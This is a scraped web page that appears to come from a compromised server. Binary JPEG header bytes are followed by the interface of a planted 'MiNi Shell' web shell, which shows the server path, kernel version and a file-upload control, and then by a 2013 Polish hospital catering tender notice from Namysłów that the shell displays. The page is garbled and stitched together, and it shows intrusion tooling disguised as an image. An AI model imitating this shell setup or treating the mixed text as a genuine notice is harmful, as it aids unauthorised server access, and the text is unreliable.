JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130603/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130603/97855-N-2013.html

<p class="kh_header"><b>Namysłów: Przygotowywanie, dostarczanie i przekazywanie
na oddziały szpitalne (do kuchenek oddziałowych) posiłków oraz odbiór odpadów pokonsumpcyjnych bezpośrednio po posiłkach.</b><br>
<b>Numer ogłoszenia: 97855 - 2013; data zamieszczenia: 03.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Namysłowskie Centrum Zdrowia Spółka Akcyjna , ul. Oleśnicka 4, 46-100 Namysłów, woj. opolskie, tel. 77 40 40 248, faks 77 40 40 250.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoznamyslow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Namysłowskie Centrum Zdrowia S.A..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowywanie, dostarczanie i przekazywanie
na oddziały szpitalne (do kuchenek oddziałowych) posiłków oraz odbiór odpadów pokonsumpcyjnych bezpośrednio po posiłkach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowywanie, dostarczanie i przekazywanie na oddziały szpitalne (do kuchenek oddziałowych) posiłków oraz odbiór odpadów pokonsumpcyjnych bezpośrednio po posiłkach. 
 Wspólny Słownik Zamówień - CPV: 55.32.10.00-6 (Usługi przygotowywania posiłków)
 Przedmioty dodatkowe - 55.52.00.00-1 (Usługi dostarczania posiłków).
Średnia dzienna ilość pacjentów - 110 osób (+/- 10%)
Oddziały szpitalne: wewnętrzny, chirurgiczny, położniczo-ginekologiczny, urologiczny, hospicjum, zakład opiekuńczo-leczniczy, dziecięcy.
Jeden osobodzień żywienia składa się ze śniadania, obiadu i kolacji. Posiłki należy dostarczać punktualnie. 
1) śniadanie - godz. 08:00
2) obiad - godz. 12:30
3) kolacja - godz. 17:00 (Zamawiający dopuszcza możliwość dostarczania kolacji łącznie z obiadem bez pogorszenia jakości dostarczanych posiłków).
Racje pokarmowe, ich wartość kaloryczną i zawartość składników odżywczych określa Zarządzenie Ministra Zdrowia i Opieki Społecznej z dnia 24 czerwca 1974r. w sprawie ustalania racji pokarmowych w całodziennym wyżywieniu określonych grup ludności (Dz. Urz. MZ i OS nr OS 16 z 1974r. poz. 69) oraz aktualnych wytycznych Instytutu Żywności 
i Żywienia.
Zbiorcze dzienne zestawienie składników pokarmowych:
Norma:
- K kalorie	- 2300-2600 kcal. 
- białko ogółem 	-     75 g.
- w tym białko zwierzęce 		- 25-50g.
- tłuszcze 				- 75-100g.
- węglowodany   			- 410-350g.
Realizacja norm według grupy produktów:
- produkty zbożowe 			- 300g.
- mleko i produkty mleczne		- 500g.
- jaja					-   1/3 szt.
- mięso wędliny i ryby			- 140g.
- masło i śmietana			           -   35g. 
- inne tłuszcze 			           -   35g.
- ziemniaki   			           - 250g.
- warzywa i owoce z witamina C             - 200g.
- warzywa i karotenem 		           - 130g.
- strączkowe suche 		           -   10g
- cukier i słodycze 		            	-   55g.

W sporządzaniu posiłków należy uwzględnić powszechnie stosowane diety w szpitalach z uwzględnieniem przede wszystkim:
a)	diety podstawowej( ogólnej)
b)	diety lekkostrawnej ( również w wersji papkowatej)
c)	diety cukrzycowej, ( również w wersji papkowatej) 
d)	diety małego dziecka,
e)	diety płynnej do żywienia pacjenta przez sondę lub PEG - dieta o zmodyfikowanej konsystencji do podawania pacjentowi żywionemu przez sondę. 
Dieta podstawowa tzw. dieta normalna - obejmuje pokarmy spożywane przez ludzi o zdrowym przewodzie pokarmowym, sposób przyrządzania posiłków uwzględnia wszystkie metody zgodnie z nowoczesną technologią potraw, stosuje się gotowanie, smażenie, duszenie, pieczenie.
Dieta lekkostrawna - stosowana jest u ludzi w chorobach przemiany materii, w chorobach serca     i układu krążenia. Zasadą diety jest nieobciążanie przewodu pokarmowego, wyklucza ostre potrawy, używki, produkty wzdymające. Jako technologie sporządzania potraw stosuje się gotowanie w wodzie na parze, duszenie bez tłuszczu.  
Dieta cukrzycowa - stosowana w zależności od wieku wagi, wzrostu, płci, pracy i stanu pacjenta. Przy sporządzaniu posiłków należy unikać stosowania cukru, dżemu, miodu. Stosuje się chude mięso, ryby, jaja, mleko i sery. Normy uwzględniają drugie śniadanie i podwieczorek.
Dieta małego dziecka - urozmaicona dieta z uwzględnieniem odpowiedniej ilości składników odżywczych, witamin i płynów dostosowanych do potrzeb małego dziecka. Dieta zawierająca: produkty mleczne np. kaszki gotowane na mleku, budynie z niewielką ilością cukru; mięso chude np. drobiowe gotowane na parze lub duszone; zupki warzywno-mięsne; chude wędliny; warzywa gotowane (bez warzyw wzdymających); wszelkiego rodzaju kasze. 
Dieta przeznaczona do żywienia pacjenta przez sondę - dieta płynna do żywienia pacjenta przez sondę lub PEG - dieta o zmodyfikowanej konsystencji do podawania pacjentowi żywionemu przez sondę, zawierająca wszystkie niezbędne składniki pokarmowe.
Wymagania jakościowe: 
1.	Przedmiot zamówienia należy wykonywać zgodnie z wymaganiami ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. Nr 171 poz. 1225 z późn. zm.) oraz wymaganiami właściwych przepisów szczególnych.
2.	Wykonawca zobowiązuje się dostarczyć termometr zanurzeniowy do pomiaru ciepłoty dostarczanych posiłków na własny koszt uwzględniony w cenie za jeden osobodzień, do dyspozycji osoby nadzorującej realizację przedmiotu umowy ze strony Zamawiającego .
     Zamawiający będzie dokonywał kontroli dostarczonych posiłków pod względem temperatury     
     gramatury oraz cech organoleptycznych 
3.	Wykonawca będzie sporządzał cyklicznie dziesięciodniowe jadłospisy i dostarczał je Zamawiającemu do zatwierdzenia faxem lub pocztą internetową, albo  listownie z tygodniowym wyprzedzeniem:
1)	w ilości jednego zestawu dla diety podstawowej,
2)	w ilości sześciu zestawów dla diety lekkostrawnej i cukrzycowej,
3)	w ilości jednego zestawu dla diety małego dziecka,
4)	w ilości jednego zestawu dla diety płynnej przeznaczonej do żywienia pacjenta przez sondę.
W jadłospisie przy diecie płynnej przeznaczonej do żywienia pacjentów przez sondę Wykonawca będzie określał zawartość kaloryczną diety i ilość białka w diecie.
Zamawiający wymaga, aby  w jadłospisie były określone ilości w gramach i sztukach produktów spożywczych w danej diecie  przeznaczonych dla jednego pacjenta. 
Każdy jadłospis musi być sporządzony i podpisany przez osobę posiadającą odpowiednie kwalifikacje
4.	Zestawy określone w pkt. 3 muszą zawierać zróżnicowane menu,
5.	Wykonawca przy sporządzaniu jadłospisów uwzględniać będzie sezonowość dostępnych na rynku świeżych produktów tj.: kalafior, brokuły, fasolka szparagowa, itp.
6.	Ilość zamawianych posiłków uzależniona będzie od ilości pacjentów.  
7.	Posiłki zamawiane będą z jednodniowym wyprzedzeniem przez Zamawiającego do godz. 14:00 dnia poprzedniego. 
8.	Korekty zamówień dotyczące obiadów i kolacji będą zgłaszane przez Zamawiającego do godz. 8:30- obiad, godz.:10:30- kolacja i godz.: 13:30- śniadanie na następny dzień  tego samego dnia (godz. do uzgodnienia z Zamawiającym).
9.	Wykonawca zobowiązuje się dostarczać naczynia jednorazowe dla pacjentów izolowanych na własny koszt uwzględniony w cenie za jeden osobodzień. Przewidywana ilość pacjentów izolowanych w roku od 5 do 15 osób przebywających w szpitalu przez około 5 dni. 
10.	Posiłki mają być przygotowane i dostarczone punktualnie przez pracowników Wykonawcy 
w odpowiednich pojemnikach przeznaczonych wyłącznie do tego celu z zachowaniem wszelkich obowiązujących warunków higieniczno-sanitarnych. Wykonawca jest zobowiązany zapewnić odpowiednie środki transportu zewnętrznego i wewnętrznego( wózki do przewożenia żywności ,termosy do transportu ciepłych posiłków itp.)
11.	Dostarczane posiłki obiadowe lub inne gorące dania muszą posiadać temperaturę:
1)	gorące zupy - minimum 75oC,
2)	gorące drugie dania - minimum 62oC,
3)	gorące napoje - minimum 80oC,
4)	sałatki i surówki - 4oC- 8 C
12.	Wykonawca zobowiązuje się do pobierania i przechowywania dla Zamawiającego  próbek żywności zgodnie  z rozporządzeniem Ministra Zdrowia z dnia 17 kwietnia 2007 r. w sprawie pobierania i przechowywania próbek żywności przez zakład żywienia zbiorowego typu zamkniętego (Dz. U. nr 80 poz. 545).
13.	Zamawiający wymaga od Wykonawcy by w okresie Świąt Bożego Narodzenia i Wielkanocy przygotował posiłki o charakterze świątecznym z uwzględnieniem tradycyjnych potraw. 
15 .Zamawiający wymaga, aby :
- obiad składał się minimum z dwóch dań 
- uwzględniał w menu surówki do  każdego dania ( dla diety papkowatej surówka     
  musi być dostosowana dla pacjentów mających problem z żuciem pokarmów)
- uwzględniał przynajmniej raz w tygodniu  potrawy z ryb
-- uwzględniał przynajmniej raz w tygodniu  potrawy jarskie( pierogi , naleśniki itp.)
- w diecie papkowatej ( dla ZOL i hospicjum )  zapewnił  zawsze sos do drugiego dania  
- zupę mleczną do śniadania
 -cytrynę do herbaty dla pacjentów w ZOL i Hospicjum
14.	Wykonawca musi przestrzegać realizacji zaleceń Sanepidu, Państwowej Inspekcji Pracy, służb ppoż, systemu HACPP itp.
15.	Pracownicy wykonawcy realizujący zamówienie powinni je wykonywać w odpowiednim ubraniu roboczym zgodnym z przepisami BHP i obowiązującymi normami w tym zakresie.
16.	Wykonawca posiada aktualne dokumenty dopuszczające samochód do transportu posiłków i na każde żądanie Zamawiającego zobowiązuje się je dostarczyć.
17.	Wykonawca gwarantuje wykonanie przedmiotu zamówienia przez wystarczającą ilość osób posiadających niezbędne kwalifikacje  w tym przynajmniej 1 osobę posiadającą  kwalifikacje dietetyka
18.	Wykonawca bierze odpowiedzialność za czystość i porządek oraz stan sanitarno-techniczny środków transportu do przewożenia posiłków, za sposób przewożenia posiłków za odbiór i utylizację resztek pokarmowych 
19.	Wykonawca ponosić będzie odpowiedzialność prawną i materialną wobec organów kontrolnych ( Stacja Sanitarno- Epidemiologiczna, PIP, BHP)w zakresie wykonywanej usługi w tym m.in. w zakresie jakości produktów i przygotowywanych posiłków, ich zgodności z wyżej opisanymi normami oraz w zakresie wymagań higieniczno-sanitarnych ,ze szczególnym uwzględnieniem reżimów obowiązujących w szpitalach
20.	Zamawiający wymaga by realizacja przedmiotu zamówienia odbywała się 
w systemie ciągłym obejmującą pracę w soboty, niedziele i dnia świąteczne
Nie dopuszcza się składania ofert częściowych.
Miejsce realizacji zamówienia: siedziba zamawiającego - kuchenki oddziałowe..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 7000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli złoży oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek jeżeli 1) złoży oświadczenie, że posiada wiedzę i doświadczenie  niezbędne do wykonywania zamówienia, 2) przedstawi wykaz wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , wraz z podaniem ich wartości , przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie na kwotę nie mniejszą niż: 
360 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli (1) oświadczy, że dysponuje odpowiednim potencjałem technicznym, (2)przedstawi wykaz narzędzi , wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami a w szczególności dotyczy transportu zewnętrznego (samochód) oraz wewnętrznego( wózki) a także naczyń ( termosy, itp.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli (1) złoży oświadczenie, że dysponuje osobami zdolnymi do wykonywania zamówienia, (2) przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacja o podstawie do dysponowania tymi zasobami, ( 3) oświadczy , że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli (1) złoży oświadczenie że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia oraz (2) przedłoży opłaconą polisę , a przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony formularz oferty,
2)	dowód wpłacenia wadium
3)	przedstawi wykaz wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , wraz z podaniem ich wartości , przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie na kwotę nie mniejszą niż 360 000,00 zł.
4)	przedstawi wykaz narzędzi , wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami 
5)	przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacja o podstawie do dysponowania tymi zasobami
6)	oświadczy , że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
7)	opłaconą polisę , a przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
8)	pełnomocnictwo - w przypadku, gdy wykonawcę reprezentuje pełnomocnik, posiadające zakres i podpisane przez osoby reprezentujące wykonawcę</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoznamyslow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Namysłowskie Centrum Zdrowia S.A. ul. Oleśnicka 4, 46-100 Namysłów, budynek administracji C, pok. nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2013 godzina 10:00, miejsce: Namysłowskie Centrum Zdrowia S.A. ul. Oleśnicka 4, 46-100 Namysłów, budynek administracji C, pok. nr 6, lub sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com